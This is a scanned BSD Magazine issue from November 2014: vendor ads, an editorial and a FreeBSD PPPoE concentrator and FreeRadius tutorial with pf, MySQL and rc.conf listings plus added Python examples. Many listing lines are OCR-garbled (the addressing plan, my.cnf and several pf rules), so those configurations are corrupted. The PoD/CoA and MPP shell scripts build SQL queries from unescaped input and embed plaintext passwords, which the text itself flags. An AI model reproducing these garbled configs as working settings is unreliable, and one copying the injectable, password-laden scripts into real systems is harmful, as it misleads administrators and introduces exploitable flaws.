HOW IMPORTANT IS YOUR DATA?

Years of family photos. Your entire music and movie collection. Office documents you've put hours of work into. Backups for every computer you own. We ask again, how important is your data?

NOW IMAGINE LOSING IT ALL

Losing one bit - that's all it takes. One single bit, and your file is gone. The worst part? You won't know until you absolutely need that file again. (Figure: example of one-bit corruption)

THE SOLUTION

The FreeNAS Mini has emerged as the clear choice to save your digital life. No other NAS in its class offers ECC (error correcting code) memory and ZFS bitrot protection to ensure data always reaches disk without corruption and never degrades over time.

No other NAS combines the inherent data integrity and security of the ZFS filesystem with fast on-disk encryption. No other NAS provides comparable power and flexibility. The FreeNAS Mini is, hands-down, the best home and small office storage appliance you can buy on the market. When it comes to saving your important data, there simply is no other solution.

The Mini boasts these state-of-the-art features:

» Up to 16TB of storage capacity
» 16GB of ECC memory (with the option to upgrade to 32GB)
» 2x 1 Gigabit network controllers
» Remote management port (IPMI)
» Tool-less design; hot swappable drive trays
» FreeNAS installed and configured
CERTIFIED STORAGE

With over six million downloads, FreeNAS is undisputedly the most popular storage operating system in the world.

Sure, you could build your own FreeNAS system: research every hardware option, order all the parts, wait for everything to ship and arrive, vent at customer service because it hasn't, and finally build it yourself while hoping everything fits - only to install the software and discover that the system you spent days agonizing over isn't even compatible. Or...

MAKE IT EASY ON YOURSELF

As the sponsors and lead developers of the FreeNAS project, iXsystems has combined over 20 years of hardware experience with our FreeNAS expertise to bring you FreeNAS Certified Storage. We make it easy to enjoy all the benefits of FreeNAS without the headache of building, setting up, configuring, and supporting it yourself. As one of the leaders in the storage industry, you know that you're getting the best combination of hardware designed for optimal performance with FreeNAS.

Every FreeNAS server we ship is...

» Custom built and optimized for your use case
» Installed, configured, tested, and guaranteed to work out of the box
» Supported by the Silicon Valley team that designed and built it
» Backed by a 3 years parts and labor limited warranty

Contact us today for a FREE Risk Elimination Consultation with one of our FreeNAS experts. Remember, every purchase directly supports the FreeNAS project so we can continue adding features and improvements to the software for years to come. And really - why would you buy a FreeNAS server from anyone else?





FreeNAS 1U
» Intel® Xeon® Processor E3-1200v2 Family
» Up to 16TB of storage capacity
» 16GB ECC memory (upgradable to 32GB)
» 2x 10/100/1000 Gigabit Ethernet controllers
» Redundant power supply

FreeNAS 2U
» 2x Intel® Xeon® Processors E5-2600v2 Family
» Up to 48TB of storage capacity
» 32GB ECC memory (upgradable to 128GB)
» 4x 1GbE Network interface (Onboard) - (Upgradable to 2 x 10 Gigabit Interface)
» Redundant Power Supply

http://www.iXsystems.com/storage/freenas-certified-storage/
EDITOR'S WORD

Hello BSD users,

We, the BSD Mag team, are releasing the new BSD issue. This issue includes the next articles that will upgrade your admin skills. We hope that you will find the articles useful. Our ultimate goal is to provide you with the knowledge and skills you need in your professional careers.

First, I would like to mention that we are publishing the last part of the Unix+ Command article, and now you have all that you need to secure your systems and to check what parts are unsecure. If you need your own centralized server you must read Tiago's article and see how to make it step by step. For the weekend, we recommend starting to play with 3D objects. Rob will show you what you can do and how to use Gimp to create your own images.

I am looking for the next topics for 2015. I'd love to receive your suggestions regarding what articles should be in the next issues of BSD. If you think we've missed a very interesting subject that should be covered, do not hesitate to write to us. I would like to present more and more Unix-oriented projects, so feel free to send your suggestions.

As always, we would like to send a warm "Thank You". If you want to go on a real life, open source journey with our rich content workshops, publications, tutorials, and so on, or if you want to get in touch with our team, please email us.

Enjoy reading,
Ewa & the BSD Mag Team


BSD MAGAZINE

Editor in Chief:
Ewa Dudzic
ewa.dudzic@software.com.pl

Contributing:
Michael Shirk, Andrey Vedikhin, Petr Topiarz, Charles Rapenne, Anton Borisov, Jeroen van Nieuwenhuizen, José B. Alós, Luke Marsden, Salih Khan, Arkadiusz Majewski, BEng, Toki Winter, Wesley Mouedine Assaby, Rob Somerville

Top Betatesters & Proofreaders:
Annie Zhang, Denise Ebery, Eric Geissinger, Luca Ferrari, Imad Soltani, Olaoluwa Omokanwaye, Radjis Mahangoe, Mani Kanth, Ben Milman, Mark VonFange

Special Thanks:
Annie Zhang
Denise Ebery

Art Director:
Ireneusz Pogroszewski

DTP:
Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl

Senior Consultant/Publisher:
Paweł Marciniak
pawel@software.com.pl

CEO:
Ewa Dudzic
ewa.dudzic@software.com.pl

Publisher:
Hakin9 Media SK
02-676 Warsaw, Poland
Postępu 17D
Poland
worldwide publishing
editors@bsdmag.org
www.bsdmag.org

Hakin9 Media SK is looking for partners from all over the world. If you are interested in cooperation with us, please contact us via e-mail: editors@bsdmag.org.

All trademarks presented in the magazine were used only for informative purposes. All rights to trademarks presented in the magazine are reserved by the companies which own them.

11/2014











IN BUSINESS

FreeNAS in an Enterprise Environment

By the time you're reading this, FreeNAS has been downloaded more than 5.5 million times. For home users, it's become an indispensable part of their daily lives, akin to the DVR. Meanwhile, all over the world, thousands of businesses, universities, and government departments use FreeNAS to build effective storage solutions in myriad applications.

What you will learn:

» How TrueNAS builds off the strong points of the FreeBSD and
» How TrueNAS meets modern storage challenges for enter

The FreeNAS operating systems is fre
the public and offers thorough doc
active community, and a feature-rig
the storage environment. Based on Free
can share over a host of protocols (SM
FTP, iSCSI, etc) and features an intuiti
the ZFS file system, a plug-in system
much more.
Despite the massive popularity
aren't aware of its big brother
data in some of the most demand
environments: the proven, enterp
professionally-supported line of
But what makes TrueNAS diff
Well, I'm glad you asked...

Commercial Grade Supp
When a mission critical stor
organization's whole operat
and running in a timely
responsiveness and expe
Created by the sa
developed FreeNAS.

THE PEOPLE WHO DEVELOP FREENAS, THE WORLD'S MOST POPULAR STORAGE OS, HAVE JUST REVAMPED TRUENAS.

POWER WITHOUT CONTROL MEANS NOTHING. TRUENAS STORAGE GIVES YOU BOTH.

» Simple Management
» Self-Healing Filesystem
» Hybrid Flash Acceleration
» High Availability
» Qualified for VMware and HyperV
» Works Great With Citrix XenServer®
» Up Front (no hidden licensing fees)

To learn more, visit: www.iXsystems.com/truenas

VMware and VMware Ready are registered trademarks or trademarks of VMware, Inc. in the United States and other jurisdictions. Citrix makes and you receive no representations or warranties of any kind with respect to the third party products, its functionality, the test(s) or the results.
CONTENTS


Tiago Felipe Goncalves 

Tiago, in his article, presents how to use a PPPoE Concentrator Dual-Stack (v4/v6) based on 
open source software for small and midsize Internet service providers. He will also describe how 
to make a FreeRadius centralized server and will cover its settings, once they are essential for 
the concentrator’s operation. 


Rob Somerville 
The next part of our Gimp series will be about 3D objects. In this article, Rob will give you more 
information about how to create a realistic 3D object for a FreeBSD carton that is print ready. 


Craig S. Wright 

The last part of Craig’s article will give you insight into Pen Testing and Audits. Craig will present 
the Netcat tool. Netcat has a number of pre-existing scripts that can allow it to act as a simple 
vulnerability scanner. It does this by connecting to the port to be tested, entering data to test a 
vulnerability and returning the result. 


Michael Ortega 

Application Security testing tools are often the best solution for security professionals tasked with 
securing applications throughout the Software Development Lifecycle (SDLC). This is where we 
introduce Acunetix! As a precursor to the remainder of this article, Michael has had the opportunity 
to work with a number of Application Security tools for large enterprises. 


Rob Somerville 











Performance and Reliability is critical

Download syslog-ng Premium Edition product evaluation here

Attend a free logging tech webinar here

BalaBit IT Security
www.balabit.com

syslog-ng log server

The world's first High-Speed Reliable Logging™ technology

HIGH-SPEED RELIABLE LOGGING

» above 500 000 messages per second
» zero message loss due to the Reliable Log Transfer Protocol™
» trusted log transfer and storage





PPPoE Concentrator Dual-Stack!

The case below is about how to run a PPPoE Concentrator Dual-Stack (v4/v6) based on open source software for small and midsize internet service providers. We will also describe how to make a FreeRadius centralized server (briefly, because the focus is the concentrator) and will cover its settings, since they are essential for the concentrator's operation.

The concentrator is based on FreeBSD 10.0-RELEASE #15, using mpd5, pf (containing a set of firewall rules for administration with the support, sysadmin and infrastructure networks, blocked users redirected to an information block page, customers behind NAT44 - I am not fond of it, but with the lack of IPv4 addresses that is inevitable nowadays - packet normalization and some security filters), recursive DNS, SNMP for data collection, quagga running zebra, ospfd and ospf6d for redistribution, a web interface for reading authentication logs, a web interface to support customers, and a pool system for public or private (NAT44), fixed or dynamic IP addressing.

Figure 1. Server load average on the results (load average and processes in the run queue, from 2014/11/21 04:47:27 to 2014/11/22 05:11:54)



Hardware: buy hardware according to your needs. If you do not understand your needs very well, there is no magic to solve your problems. The FreeRadius server needs fast disks, preferably SAS in a safe array (RAID10 fits well), plenty of memory, since that is what lets you tune MySQL, and a good NIC. I believe that nowadays 32GB is accessible to everyone.

The PPPoE concentrator is a case of great myths, but what really matters is that the higher the clock frequency, the better your throughput, and combined with appropriate NICs, many cores are essential to the concentrator's operation. Disk and memory: anything goes. I'm using 2x Intel(R) Xeon(R) CPU E5506 @ 2.13GHz (this processor is not appropriate because of its low frequency, but it was what I had at the time) and two Intel I350-T4 network adapters.

Results: ~3500 PPPoE clients, ~450Mbps and 100Kpps.

Mathematical estimate of what we could reach with this server: ~7000 customers and/or ~900Mbps.

Just as a reminder, we have more options. I used several concentrators redistributed through OSPF and several FreeRadius servers made redundant through CARP and MySQL master-master replication; this is not a rule, it depends on your infrastructure. And if you need better results, invest in 6 or 8 cores and Intel X540 or X520 NICs.

Tests were performed with firewalls controlling bandwidth: ipfw through dummynet, and pf using ALTQ with several dynamic anchors, due to the unique sense of control provided by ALTQ. The results obtained with pf were better than the results obtained with ipfw, but with pf the administration can get very confusing and does not scale when the number of customers increases.

Other tests were performed with control through ng_bpf and ng_car, and in these cases the results obtained in performance and scalability were amazing!

I thank the community that continues to contribute to open source, as the main reason for this publication is "knowledge must be open"! I would like to cite all the references and ideas that many searches showed me, but nothing compares to the FreeBSD Developers' Handbook and a blog that always has valuable information, https://calomel.org/;


Figure 2. Simple topology of the implementation
it's well worth reading because it helped me a lot and helps me in my day to day with BSD and networks. In particular, I thank my best friend Marcos Buzo for his collaboration; he helped me a lot along the way and is always helpful. The addressing plan used throughout is in Listing 1.

Let's start with FreeRadius!

This is the configuration of a simple, valid and functional server. I include some files that are not strictly needed, only as a reference in case you have questions; the necessary settings are the following. Edit rc.conf with some settings and startup daemons (Listing 2).

Compile a new kernel:

# cd /usr/src/sys/amd64/conf/
# mkdir -p /root/kernels/
# cp GENERIC /root/kernels/yggdrasil
# ln -s /root/kernels/yggdrasil .

Add these lines to the kernel:

# vi /root/kernels/yggdrasil
device pf
device pflog
device pfsync

# cd /usr/src
# make buildkernel KERNCONF=yggdrasil
# make installkernel KERNCONF=yggdrasil


Listing 1. Addressing plan

The mentioned address blocks are reserved for documentation - RFC 5737.
The block 203.0.113.0/24 (TEST-NET-3) will represent public and routable addresses.
The block 198.51.100.0/24 (TEST-NET-2) will represent private addresses for communication with the Radius (yggdrasil.connectionlost.com.br) server.
The block 192.0.2.0/24 (TEST-NET-1) will represent private addresses for NAT use with customers (I am against it, but unfortunately in a few cases we do have to use it).
The mentioned IPv6 address prefix is reserved for documentation - RFC 3849.
I am using an alias block 198.51.100.0/24 on the interface, but this flow could be segregated in a VLAN or a dedicated interface for security purposes.

Addresses configuration:

Gateway: 203.0.113.1

Radius:
  Host: yggdrasil.connectionlost.com.br
  Public IP: 203.0.113.2/24
  Radius IP: 198.51.100.2/24

Concentrator:
  Host: valhalla.connectionlost.com.br
  Public IP: 203.0.113.5/24
  Pubikie gtr 76.0 20 Oleding 357 32
  Radius IP: 198.51.100.5/24
  Private IP: 192.0.2.5/24
  Hadise LomaleloogbackeLe. 9? thos. InOIOR IF 32

SVcacmuneee 70s Jeni sao ey 74
Sysadmin IPv6: 2001:db8::cafe/32

Infrastructure IP: 203.0.113.10/24

MOMiPOmingucohyet lls = 203 JVs sik)/ 24
Monitoring server IPv6: 2001:db8::10/32

Welbesemvei: 00 Oe iiboe Idk) 24
Web server IPv6: 2001:db8::11/32

Listing 2.

# vi /etc/rc.conf
hostname="valhalla.connectionlost.com.br"
ifconfig_igb0="inet 203.0.113.2 netmask 255.255.255.0"
ifconfig_igb0_alias0="inet 198.51.100.2 netmask 255.255.255.0"
defaultrouter="203.0.113.1"
gateway_enable="YES"

pf_enable="YES"
pf_rules="/etc/pf.conf"
pf_flags=""
pflog_enable="YES"
pflog_flags=""
pflog_logfile="/var/log/pflog"

mysql_enable="YES"
Myc clears = a aelay— loo —imycel as laveauela yet hoe name-resolve”

sshd_enable="YES"
radiusd_enable="YES"
fsck_y_enable="YES"
ntpd_enable="YES"

postfix_enable="YES"
sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
daily_clean_hoststat_enable="NO"
daily_status_mail_rejects_enable="NO"
daily_status_include_submit_mailq="NO"
daily_submit_queuerun="NO"
#eof
Listing 3.

# vi /usr/local/etc/my.cnf
[client]

[mysqld]
port = 3306
skip-locking
key_buffer = 256M
max_allowed_packet = 4M
sort_buffer_size = 1M
read_buffer_size = 1M
GeaC wane OUbnem si Zee—. 21)
My tSa sO nD On rem es uZe — 53 2)
thread_cache_size = 10
query_cache_size = 8M
thread_concurrency = 4
max_connections = 500
Bineadmeadchens tae — 0
query_cache_size = 173M
query_cache_type = 1
query_cache_limit = 1M
join_buffer_size = 256K
tmp_table_size = 32M
max_heap_table_size = 32M
Key Dumskemsemsae = 9504)
table_cache = 128

# 7 very important lines
innodb_file_per_table
innodb_flush_method=O_DIRECT
innodb_log_file_size=1G
innodb_buffer_pool_size=4G
log = /var/log/mysqld.log
log_slow_queries = /var/log/mysqld.slow.log
log-error = /var/log/mysqld.error.log
long_query_time=2

datadir = /store/db/mysql
Siete loe Eng
log-bin=mysql-bin
server-id = 2
innodb_data_home_dir = /store/db/mysql/
innodb_buffer_pool_size = 1G
innodb_additional_mem_pool_size = 64M
innodb_log_file_size = 128M
innodb_log_buffer_size = 64M
innodb_flush_log_at_trx_commit = 2
innodb_data_file_path = ibdata1:100M:autoextend
innodb_lock_wait_timeout = 500

[mysqldump]
quick
max_allowed_packet = 24M

[mysql]
no-auto-rehash

[isamchk]
key_buffer = 384M
SOGE  Ouimiciw ewze = be
beac you mrem == 71!
write_buffer = 2M

[myisamchk]
key_buffer = 64M
SOGr  OUmmmetay ewes — aol
peac OuUnher —— 7)
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout
#eof

Let's create the log files:

# touch /var/log/mysqld.log
# touch /var/log/mysqld.slow.log
# touch /var/log/mysqld.error.log
# chown mysql:mysql /var/log/mysqld.log
# chown mysql:mysql /var/log/mysqld.slow.log
# chown mysql:mysql /var/log/mysqld.error.log
Listing 4.

# cat /etc/pf.conf
#if ext
ext_if = "igb0"
Sx pe = Worm) alles
SEs Ton teercliabhs), Lhe Psy OGNR Ae

#tables
table <ssh_abuse> persist

# private ips tables, be careful to not block yourself
Nene aS ys lO Oey Crea Oey Gp dno 0Uy LZ,
OOOO eee Are One Ze AP OOO eNO. Or,
ZOO OOO A Ae Dee oy Os

ssh_extport = "2220"

set block-policy drop
set loginterface $ext_if
set fingerprints "/etc/pf.os"
set skip on lo0

scrub in all fragment reassemble max-mss 1460
scrub out random-id max-mss 1460

block in log quick proto tcp flags FUP/WEUAPRSF
block in log quick proto tcp flags WEUAPRSF/WEUAPRSF
block in log quick proto tcp flags SRAFU/WEUAPRSF
block in log quick proto tcp flags /WEUAPRSF
block in log quick proto tcp flags SR/SR
block in log quick proto tcp flags SF/SF

block in quick from urpf-failed

# try to block nmap scans
block in log quick on $ext_if inet proto tcp from any to any flags FUP/FUP

# block RFC 1918 addresses
block drop in log (all) quick on $ext_if from $martians to any
bilteekidinep tnliog (alll) Squich ons cx rete rodius From Smartians to any
block drop out log (all) quick on $ext_if from any to $martians
RO Chercise Om Ouiive he cente Isl) Mic thte Rontre uy hom acicstle mt LOM any to Smartians

# ssh abuse
block in log quick from <ssh_abuse>

block log all

# release and mark output
pass out keep state

pass quick on lo0 all

# icmp type 8
Pass 20 ON) eu eeu Prore Teme trom (703. 0.1365} I) MSc iO ake ycS
Pass 20 0) ~cxu Ji aimee Proro vem trom (203.0) ilo 05} POM > Gee Mpa caC hl Ce mele aly on ©

# ospf
pass proto ospf from 203.0.113.0/24 to any

# allow out the default range for traceroute (8):
# "base+nhops*nqueries-1" (33434+64*3-1)
pass out on $ext_if inet proto udp from any to any port 33433 >< 33626 keep state
pass out on $ext_if inet6 proto udp from any to any port 33433 >< 33626 keep state

# monitoring
pass cuUlckyprore (eco, ude, Erom 20o- Ue lls] 0h onan, keep state

# sql/radius
pass on $ext_if proto {tcp, udp} from 198.51.100.5 to 2 Geerhe eclo tome. omo mae

# ssh
pass in log on $ext_if proto tcp from any to $ext_ip port $ssh_extport flags S/SA keep state (max-src-conn 10, max-src-conn-rate 3/5, overload <ssh_abuse> flush)
pass in log on $ext_if proto tcp from any to $ext_ip_radius port $ssh_extport flags S/SA keep state (max-src-conn 10, max-src-conn-rate 3/5, overload <ssh_abuse> flush)

#eof
Listing 5.

# cat /root/scripts/pod_drop.sh
#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

if [ -z "$1" ]
then
    echo "Usage: $0 {customer}"
    exit 1
fi

# non-interactive MySQL client: -s -N gives a bare tab-separated row, -e takes the query
radius="/usr/local/bin/mysql -u userradius -h localhost radius -psenharadius -s -N -e"

# most recent open accounting session for this customer
c_drop=$($radius"SELECT Username, AcctSessionId, NASIPAddress FROM radacct WHERE username='$1' AND acctstoptime IS NULL ORDER BY acctstarttime DESC LIMIT 1")

username=$(echo $c_drop | awk '{print $1}')
session=$(echo $c_drop | awk '{print $2}')
nas=$(echo $c_drop | awk '{print $3}')

if [ "$nas" != "" ]
then
    # Disconnect-Request (PoD) to the concentrator's CoA port, signed with the CoA secret
    echo "Acct-Session-Id=$session, User-Name=$username, NAS-IP-Address=$nas" | radclient -x $nas:3799 disconnect mudar_senha
fi

#eof
Listing 6.

#vi coa_change.sh
#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

if [ -z "$1" ]
then
    echo "Usage: $0 {customer} {down speed in kbyte} {up speed in kbyte}"
    exit 1
else
    if [ -z "$2" ]
    then
        echo "Usage: $0 {customer} {down speed in kbyte} {up speed in kbyte}"
        exit 1
    else
        if [ -z "$3" ]
        then
            echo "Usage: $0 {customer} {down speed in kbyte} {up speed in kbyte}"
            exit 1
        fi
    fi
fi

radius="/usr/local/bin/mysql -u userradius -h localhost radius -psenharadius -s -N -e"

c_coa=$($radius"SELECT Username, AcctSessionId, NASIPAddress FROM radacct WHERE username='$1' AND acctstoptime IS NULL ORDER BY acctstarttime DESC LIMIT 1")

username=$(echo $c_coa | awk '{print $1}')
session=$(echo $c_coa | awk '{print $2}')
nas=$(echo $c_coa | awk '{print $3}')

# rate in bit/s for mpd's rate-limit; the normal-burst multiplier is illegible in
# the scanned original, 0.1875 (1.5 s worth of bytes) is an assumed placeholder,
# adjust it to your own policy; excess burst is twice the normal burst
nb_factor="0.1875"
vdown=$(echo $2"000")
vdown_nb=$(echo "$vdown * $nb_factor" | bc | cut -d. -f1)
vdown_eb=$(echo "2 * $vdown_nb" | bc | cut -d. -f1)
vup=$(echo $3"000")
vup_nb=$(echo "$vup * $nb_factor" | bc | cut -d. -f1)
vup_eb=$(echo "2 * $vup_nb" | bc | cut -d. -f1)

# CoA-Request carrying two mpd-limit VSAs (in and out), no disconnect
echo "User-Name=$username,mpd-limit += \"in#1=all rate-limit $vup $vup_nb $vup_eb\",mpd-limit += \"out#1=all rate-limit $vdown $vdown_nb $vdown_eb\"" | radclient -x $nas:3799 coa mudar_senha

#eof
We will install the necessary packages. Install mysql-server on your FreeBSD:

# cd /usr/ports/databases/mysql51-server/
# make install clean

Install freeradius:

# cd /usr/ports/net/freeradius2/
# make install clean

Remember to enable the MySQL option in the freeradius port.

This is an example configuration file for MySQL; feel free to change it: Listing 3.

I will post on my blog a perl script that helps with tuning MySQL; it was not worth it on this server because the hardware is well below expectations. Check it out when you can: www.connectionlost.com.br.

Let's set up a firewall (it can vary greatly depending on your infrastructure), as this is an important point of our infrastructure: Listing 4. Note the ssh rules at the end: beyond 10 concurrent connections or a burst of new connections from one source, the source address is put into the ssh_abuse table, its existing states are flushed, and the "block in log quick from <ssh_abuse>" rule placed before the pass rules drops it from then on.
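The option that does the real work in the ssh rules of Listing 4 is "max-src-conn-rate 3/5, overload <ssh_abuse> flush". It is easy to read "3/5" as a strict three-connections-per-five-seconds window, but pf keeps a per-source counter that decays with elapsed time instead. The Python below is an added example, not code from the article or from pf; it models that accounting the way I understand pf's pf_add_threshold()/pf_check_threshold() arithmetic in sys/netpfil/pf/pf.c (a counter scaled by 1000, reduced in proportion to the elapsed fraction of the interval, incremented by 1000 per new connection, and compared against limit * 1000), so you can see which sources would land in the table. The event list is constructed; confirm the arithmetic against your kernel's pf.c before relying on the exact boundaries.

```python
"""Model of pf's max-src-conn-rate N/S accounting as used by the ssh rule in Listing 4."""
PF_THRESHOLD_MULT = 1000   # pf scales the counter by 1000 so it can decay with integer math


class SourceRate:
    """Per-source decaying counter; mirrors pf_add_threshold()/pf_check_threshold()."""

    def __init__(self, limit, seconds):
        self.limit = limit * PF_THRESHOLD_MULT
        self.seconds = seconds
        self.count = 0
        self.last = None

    def add(self, now):
        """Account one new connection at integer second `now`; True when over the limit."""
        if self.last is None or now - self.last >= self.seconds:
            self.count = 0
        else:
            # decay in proportion to the part of the interval that has elapsed
            self.count -= self.count * (now - self.last) // self.seconds
        self.count += PF_THRESHOLD_MULT
        self.last = now
        return self.count > self.limit


def simulate(events, limit=3, seconds=5):
    """events: (second, source) for each new SYN that reaches the ssh pass rule.
    Returns the sources the overload option would add to <ssh_abuse>, in order."""
    per_source = {}
    table = []
    for now, src in sorted(events):
        if src in table:
            continue   # 'block in log quick from <ssh_abuse>' now drops it before the pass rule
        tracker = per_source.setdefault(src, SourceRate(limit, seconds))
        if tracker.add(now):
            table.append(src)
    return table


if __name__ == "__main__":
    # constructed sample: a burst of four SYNs from .200, a slow probe every 2 s from .201
    sample = [(10, "203.0.113.200")] * 4 + [(t, "203.0.113.201") for t in range(0, 12, 2)]
    print(simulate(sample))   # ['203.0.113.200']
```

Two consequences worth knowing before you tune the numbers: four connections in the same second trip a 3/5 rule, but four connections one second apart do not (the counter has decayed to 2952 by the fourth), and a probe every two seconds never trips it at all. If you want a stricter cut-off, lower the rate or lengthen the interval; the `flush` keyword is what kills the attacker's already-open states, without it only new connections are refused.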

Now let's go over some scripts needed to make everything work.

This script is used to generate PoD packets, or Packet of Disconnect (it disconnects users): Listing 5. Make it executable:

# chmod +x /root/scripts/pod_drop.sh

This script is used to generate CoA packets, or Change of Authorization (in this case, the script changes the speed of the client without dropping it): Listing 6. Make it executable:

# chmod +x /root/scripts/coa_change.sh

Both scripts splice the customer name straight into the SQL query and pass the MySQL password on the command line, where any local user can read it with ps; keep them on the radius host, run them only from a trusted operator account, and prefer putting the credentials in that account's ~/.my.cnf. The secret given to radclient (mudar_senha here) is the only thing that authenticates a PoD or CoA packet to the concentrator, so choose it like a password and let UDP 3799 on the concentrator accept packets only from the radius address.
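Both scripts hand a few attribute lines to radclient and let it do the packet work. The Python below is an added example, not code from the article, radclient or mpd; it builds the same Disconnect-Request and CoA-Request packets (RFC 5176) on the wire, including the mpd-limit vendor attribute under mpd's vendor id 12341, and then performs the check a NAS does before honouring one: the Request Authenticator (MD5 over the packet with a zeroed authenticator plus the shared secret) and the Message-Authenticator (HMAC-MD5 keyed with the secret) must both validate. The secret is the one used in the scripts; the username, session id and NAS address are constructed sample values.

```python
"""RADIUS Disconnect-Request / CoA-Request packets as radclient sends them (RFC 5176)."""
import hashlib
import hmac
import struct

DISCONNECT_REQUEST = 40
COA_REQUEST = 43
ATTR_USER_NAME = 1
ATTR_NAS_IP_ADDRESS = 4
ATTR_VENDOR_SPECIFIC = 26
ATTR_ACCT_SESSION_ID = 44
ATTR_MESSAGE_AUTHENTICATOR = 80
VENDOR_MPD = 12341      # vendor id in mpd's dictionary.mpd
MPD_LIMIT = 7           # mpd-limit (string)
HEADER_LEN = 20         # code, identifier, length, 16-byte authenticator


def avp(attr_type, value):
    """One attribute: type, length (header included), value of at most 253 bytes."""
    if len(value) > 253:
        raise ValueError("RADIUS attribute value longer than 253 bytes")
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def session_attrs(username, session_id, nas_ip):
    """The three identifiers pod_drop.sh feeds to radclient for a disconnect."""
    return [
        avp(ATTR_ACCT_SESSION_ID, session_id.encode()),
        avp(ATTR_USER_NAME, username.encode()),
        avp(ATTR_NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))),
    ]


def mpd_limit(direction, rate_bps, normal_burst, excess_burst):
    """Vendor-Specific wrapper around the mpd-limit string coa_change.sh builds."""
    text = "%s#1=all rate-limit %d %d %d" % (direction, rate_bps, normal_burst, excess_burst)
    inner = avp(MPD_LIMIT, text.encode())
    return avp(ATTR_VENDOR_SPECIFIC, struct.pack("!I", VENDOR_MPD) + inner)


def build_request(code, identifier, secret, attrs):
    """Encode and sign a DM/CoA request with the shared secret (bytes)."""
    body = b"".join(attrs)
    length = HEADER_LEN + len(body) + 18          # +18: the Message-Authenticator AVP
    header = struct.pack("!BBH", code, identifier, length)
    zero = bytes(16)
    # Message-Authenticator: HMAC-MD5 over the packet with the authenticator
    # field and the M-A value both zeroed (the order radclient/FreeRADIUS use).
    unsigned = header + zero + body + avp(ATTR_MESSAGE_AUTHENTICATOR, zero)
    msg_auth = hmac.new(secret, unsigned, hashlib.md5).digest()
    signed_body = body + avp(ATTR_MESSAGE_AUTHENTICATOR, msg_auth)
    # Request Authenticator (RFC 5176 s.3): MD5(Code+ID+Length+16 zero octets+attributes+secret)
    req_auth = hashlib.md5(header + zero + signed_body + secret).digest()
    return header + req_auth + signed_body


def parse_attrs(packet):
    """Return (type, offset, value) per attribute; reject short or overlapping ones."""
    attrs, pos = [], HEADER_LEN
    while pos < len(packet):
        if pos + 2 > len(packet):
            raise ValueError("truncated attribute header")
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > len(packet):
            raise ValueError("malformed attribute length")
        attrs.append((attr_type, pos, packet[pos + 2:pos + attr_len]))
        pos += attr_len
    return attrs


def verify_request(packet, secret):
    """The NAS-side check: both authenticators must validate under the shared secret."""
    if len(packet) < HEADER_LEN:
        return False
    code, _ident, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet) or code not in (DISCONNECT_REQUEST, COA_REQUEST):
        return False
    zero = bytes(16)
    header, vector, body = packet[:4], packet[4:HEADER_LEN], packet[HEADER_LEN:]
    if not hmac.compare_digest(hashlib.md5(header + zero + body + secret).digest(), vector):
        return False
    try:
        attrs = parse_attrs(packet)
    except ValueError:
        return False
    for attr_type, pos, value in attrs:
        if attr_type == ATTR_MESSAGE_AUTHENTICATOR:
            if len(value) != 16:
                return False
            blanked = bytearray(packet)
            blanked[4:HEADER_LEN] = zero
            blanked[pos + 2:pos + 18] = zero
            mac = hmac.new(secret, bytes(blanked), hashlib.md5).digest()
            return hmac.compare_digest(mac, value)
    # Without a Message-Authenticator only the MD5-based Request Authenticator
    # ties the packet to the secret; prefer NAS settings that require the M-A.
    return True
```

Usage inside the block's namespace: `build_request(DISCONNECT_REQUEST, 7, b"mudar_senha", session_attrs("cliente01", "8c0000a3", "198.51.100.5"))` is the packet pod_drop.sh produces, and `build_request(COA_REQUEST, 8, secret, [avp(ATTR_USER_NAME, b"cliente01"), mpd_limit("in", 10000000, 1875000, 3750000)])` the CoA one. Feeding either to `verify_request` with a different secret returns False, which is exactly what the concentrator does with a packet from anyone who does not hold mudar_senha; flipping one byte of the session id has the same effect. The checks cost one MD5 and one HMAC per packet, so there is no reason to leave the Message-Authenticator out.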


This script will help you if you have many clients with multiple logins. For large quantities it can disrupt the functioning of your concentrator, but it does away with worries about simultaneous logins and the FreeRadius problems they cause (Listing 7). Make it executable:

# chmod +x /root/scripts/mpp.sh

To run it, put it in your cron or use screen:

# screen -dmS mpp /root/scripts/mpp.sh

If you have a backup script or something else that can take a big lock on your database, remember to stop this script and start it again after the backup has run.

Now let's configure FreeRadius: Listing 8. Next we need to create a database in MySQL for FreeRadius. This is the required schema: Listing 9. Create the database (the last two statements are typed at the mysql> prompt):

# mysql -u root -p
mysql> create database radius;
mysql> grant all privileges on radius.* to 'userradius'@'localhost' identified by 'senharadius';
mysql> grant all privileges on radius.* to 'userradius'@'198.51.100.5' identified by 'senharadius';

The second grant is what lets the concentrator (198.51.100.5) query the database directly; keep that reachable only over the 198.51.100.0/24 radius network, which is what the sql/radius rule in Listing 4 does.

Give access to the key that we will create on the concentrator, so that the web CGI works properly: Listing 10.

Figure 3. NetFlow data - packets on the results (packets/s, any protocol, Sat Nov 22 07:40:00 2014; all: 86.2 k/s, tcp: 69.3 k/s)
Listing 7.

# cat mpp.sh
#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

radius="/usr/local/bin/mysql -u root -h localhost radius -psenharadius -s -N -e"

#c_coa=$($radius"SELECT Username, AcctSessionId, NASIPAddress FROM radacct WHERE username='$1' AND acctstoptime IS NULL ORDER BY acctstarttime DESC LIMIT 1")

# follow radius.log; a "Multiple logins (max N) [MPP attack?]: [user] (...)" line
# has the bracketed user name in field 14, strip the brackets and close its stale session
tail -f /var/log/radius.log | while read line
do
    mpp=$(echo $line | grep MPP | awk '{print $14}' | sed 's/\[//; s/\]//')
    if [ "$mpp" != "" ]
    then
        $radius"update radacct set acctstoptime=now() where acctstoptime is null and username='$mpp';"
        echo "MPP client - $mpp."
    fi
done

#eof


Listing 8.

# vi /usr/local/etc/raddb/clients.conf
client localhost {
	ipaddr = 127.0.0.1
	# testing123 is the stock FreeRADIUS secret; change it even for localhost
	secret = testing123
	require_message_authenticator = no
	shortname = localhost
	nastype = other
}

client 198.51.100.5 {
	shortname = valhalla
	secret = senhaclienteradius
